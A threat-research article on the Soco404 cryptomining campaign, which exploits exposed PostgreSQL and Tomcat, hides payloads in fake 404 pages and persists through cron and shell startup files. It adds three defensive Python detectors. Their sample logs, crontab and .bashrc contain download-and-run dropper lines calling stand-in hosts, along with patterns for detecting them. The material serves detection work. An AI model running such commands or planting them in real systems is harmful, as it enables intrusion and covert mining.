Beware of Fake Error Pages Deploying Platform-Specific Malware on Linux and Windows Systems

Wiz Research has uncovered an active cryptomining campaign, dubbed Soco404, that exploits misconfigurations in PostgreSQL databases and other cloud services to deploy platform-specific malware on both Linux and Windows systems.

This operation, part of a broader crypto-scam infrastructure, leverages opportunistic scanning for exposed services, abusing features like PostgreSQL’s COPY FROM PROGRAM for remote code execution (MITRE T1190).

Attackers target publicly accessible instances, which Wiz data indicates affect nearly one-third of self-hosted PostgreSQL deployments in cloud environments, representing a high-risk attack surface.
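As an added example that is not part of the Wiz report or its tooling, the following Python script scans constructed PostgreSQL statement-log lines (log_statement = 'all', with a `[pid] user@db` prefix assumed in log_line_prefix) for the COPY ... FROM PROGRAM primitive described above and marks commands that look like a download-and-run dropper; the role-audit query at the top is the preventive counterpart.

```python
import re

# Constructed sample lines in PostgreSQL's log_statement = 'all' format (not real logs).
SAMPLE_PG_LOG = """\
2025-07-01 10:02:11 UTC [2231] postgres@postgres LOG:  statement: SELECT version();
2025-07-01 10:02:14 UTC [2231] postgres@postgres LOG:  statement: COPY cmd_out FROM PROGRAM 'curl -s http://example.invalid/soco.sh | sh';
2025-07-01 10:02:15 UTC [2231] postgres@postgres LOG:  statement: CREATE TABLE cmd_out(line text);
2025-07-01 10:03:00 UTC [2240] app@orders LOG:  statement: COPY orders FROM '/var/lib/postgresql/import/orders.csv' CSV;
2025-07-01 10:03:30 UTC [2231] postgres@postgres LOG:  statement: copy   t   from   program   'wget -qO- http://example.invalid/ldr.sh | bash';
"""

# COPY ... FROM/TO PROGRAM '<command>' in any case or spacing; '' is an escaped quote in the literal.
COPY_PROGRAM_RE = re.compile(
    r"\bCOPY\b.*?\b(?:FROM|TO)\s+PROGRAM\s+'(?P<cmd>(?:[^']|'')*)'",
    re.IGNORECASE | re.DOTALL,
)
# "[pid] user@database" prefix, assumed to come from %p and %u@%d in log_line_prefix.
SESSION_RE = re.compile(r"\[(?P<pid>\d+)\]\s+(?P<user>[^@\s]+)@(?P<db>\S+)")
# Fragments typical of a download-and-run dropper command.
DROPPER_HINTS = ("curl", "wget", "| sh", "| bash", "base64")

# Preventive check to run against the server itself (not executed by this script):
# lists the roles able to use COPY ... PROGRAM, i.e. superusers and pg_execute_server_program members.
AUDIT_ROLES_SQL = (
    "SELECT rolname FROM pg_roles "
    "WHERE rolsuper OR pg_has_role(oid, 'pg_execute_server_program', 'MEMBER');"
)

def find_copy_program(log_text):
    """Return one finding per statement-log line that invokes COPY ... PROGRAM.

    Multi-line statements must be joined into one line before calling this."""
    findings = []
    for line in log_text.splitlines():
        m = COPY_PROGRAM_RE.search(line)
        if not m:
            continue
        cmd = m.group("cmd").replace("''", "'")
        s = SESSION_RE.search(line)
        findings.append({
            "pid": s.group("pid") if s else None,
            "user": s.group("user") if s else None,
            "db": s.group("db") if s else None,
            "command": cmd,
            "dropper_like": any(h in cmd.lower() for h in DROPPER_HINTS),
        })
    return findings
```

Ordinary file-based COPY statements (the fourth sample line) are deliberately not reported, so the check stays quiet on normal bulk loads.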

[Figure: Soco404 attack flow]

Exploitation of Cloud Misconfigurations

After gaining access via weak credentials or vulnerabilities such as CVE-2025-24813 in Apache Tomcat, the threat actors host their payloads on compromised legitimate servers, including a notable Korean transportation website, so that malware is distributed from trusted-looking origins and evades detection.

The campaign employs process masquerading (MITRE T1036.005), disguising malicious binaries as legitimate system processes like sd-pam or kernel workers, and ensures persistence through cron jobs (MITRE T1053.003) and modifications to shell initialization files such as .bashrc and .profile (MITRE T1546.004).

Malware payloads are ingeniously embedded as base64-encoded blobs within fake 404 error pages hosted on Google Sites and custom domains, which display innocuous error messages but facilitate payload extraction and execution upon access.
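To illustrate the hosting trick just described, here is an added Python detector (not from the report) that takes a constructed fake 404 page, finds long base64 runs in it, and reports any that decode to an executable or script by magic bytes; the embedded blob is an ELF header followed by inert filler, not a real binary.

```python
import base64
import re

# Constructed fake 404 page for this example: a harmless-looking error message with a
# base64 blob (an ELF magic header plus inert filler, not a real binary) in a hidden element.
_FAKE_PAYLOAD = b"\x7fELF\x02\x01\x01" + b"\x00" * 9 + b"constructed-inert-filler-bytes" * 4
SAMPLE_404_HTML = (
    "<html><head><title>404 Not Found</title></head><body>"
    "<h1>404</h1><p>The page you requested could not be found.</p>"
    '<div style="display:none">' + base64.b64encode(_FAKE_PAYLOAD).decode() + "</div>"
    "</body></html>"
)
# A clean error page for comparison.
CLEAN_404_HTML = "<html><head><title>404 Not Found</title></head><body><p>Not found.</p></body></html>"

# Runs of base64 alphabet; 64+ characters is far longer than ordinary page text produces.
B64_RUN_RE = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")
# Leading bytes that identify what a decoded blob is.
MAGICS = (
    (b"\x7fELF", "ELF executable"),
    (b"MZ", "PE executable"),
    (b"UPX!", "UPX-packed binary"),
    (b"#!", "script with shebang"),
)

def classify(data):
    """Label decoded bytes by magic; None means nothing executable was recognised."""
    for magic, label in MAGICS:
        if data.startswith(magic):
            return label
    return None

def scan_page(html):
    """Find base64 runs in a page and report those that decode to an executable or script."""
    hits = []
    for m in B64_RUN_RE.finditer(html):
        try:
            data = base64.b64decode(m.group(0), validate=True)
        except ValueError:  # not really base64 (bad alphabet, length or padding)
            continue
        label = classify(data)
        if label:
            hits.append({"kind": label, "size": len(data), "offset": m.start()})
    return hits

def is_payload_carrying_error_page(html):
    """True when the page presents itself as an error page but embeds an executable blob."""
    looks_like_error = re.search(r"<title>[^<]*\b(404|403|500)\b", html, re.IGNORECASE) is not None
    return looks_like_error and bool(scan_page(html))
```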

[Figure: fake 404 error page serving the Windows payload]

In-Depth Technical Breakdown

In the Linux variant, attackers execute an in-memory dropper script, soco.sh, fetched via tools like curl or wget from compromised Apache Tomcat servers (MITRE T1105).

This script downloads a UPX-packed Go binary obfuscated with Garble (MITRE T1027), which unpacks in memory, spawns child processes communicating over local sockets (MITRE T1559), and connects to C2 domains like www.fastsoco.top for the main payload.

The binary eliminates competing miners by clearing ld.so.preload, killing rogue processes, and wiping logs (MITRE T1070.002), and if it is running as root it tunes the system for mining, for example by enabling huge pages and tweaking model-specific registers (MSRs) on AMD or Intel CPUs.

Persistence is reinforced by cron entries and shell file injections, leading to cryptocurrency mining on pools like c3pool and moneroocean using specific wallet addresses.
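The persistence and masquerading techniques described above (cron jobs, .bashrc/.profile injection, binaries posing as sd-pam or kernel workers) can be audited with the added Python script below, which is not part of the report; it runs over constructed crontab and .bashrc contents, and the patterns, file names and paths in it are assumptions chosen to match those descriptions.

```python
import re

# Constructed sample artifacts for this example (not from a real host).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/10 * * * * curl -fsSL http://example.invalid/soco.sh | sh >/dev/null 2>&1
*/5 * * * * /tmp/.sd-pam >/dev/null 2>&1
"""
SAMPLE_BASHRC = """\
# ~/.bashrc
alias ll='ls -alF'
export PATH="$HOME/bin:$PATH"
(wget -qO- http://example.invalid/ldr.sh || curl -s http://example.invalid/ldr.sh) | bash &
echo 'aGVsbG8=' | base64 -d | sh
"""

# Patterns drawn from the techniques described: download piped to a shell, inline base64
# decoded into a shell, system-process names living in user-writable paths, and anything
# executed from a temp or shared-memory directory. Order matters: first match wins.
SUSPICIOUS = (
    ("download piped to shell", re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")),
    ("base64 decoded into shell", re.compile(r"base64\s+(-d|--decode).*\|\s*(ba)?sh\b")),
    ("system process name in a user-writable path",
     re.compile(r"/(tmp|dev/shm|var/tmp|home/\S+)/\.?(sd-pam|kworker\S*|kthreadd)\b")),
    ("executable in temp/shm path", re.compile(r"(^|\s)/(tmp|dev/shm|var/tmp)/\S+")),
)

def audit_text(source, text):
    """Return (source, line_no, reason, line) for each suspicious non-comment line."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        for reason, pat in SUSPICIOUS:
            if pat.search(stripped):
                hits.append((source, n, reason, stripped))
                break  # one reason per line is enough for triage
    return hits

def audit_all(sources):
    """Audit a mapping of {name: file contents}, e.g. crontab output and shell init files."""
    return [h for name, text in sources.items() for h in audit_text(name, text)]
```

On a live host the inputs would come from `crontab -l`, /etc/cron.d, and each user's .bashrc and .profile; the scan itself is unchanged.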

For Windows, the payload ok.exe is delivered via certutil, PowerShell Invoke-WebRequest, or curl fallbacks, dropping to writable paths like C:\Users\Public.

It establishes persistence as a service (MITRE T1543.003) with random names, injects into conhost.exe (MITRE T1055), deploys the WinRing0.sys driver for resource access, and halts event logging (MITRE T1562.002) before initiating mining with the same wallets.

Evidence links Soco404 to crypto-scam sites like seeyoume.top, which mimic legitimate exchanges and embed similar payloads, suggesting a versatile operation blending cryptojacking with social engineering.

Wiz’s Dynamic Scanner identifies exposed PostgreSQL instances with weak credentials, while the Runtime Sensor detects anomalous behaviors from initial exploitation through to mining (MITRE T1496). The campaign remains active, with fluctuating worker counts in the mining pools indicating ongoing infections.

Indicators of Compromise (IOCs)

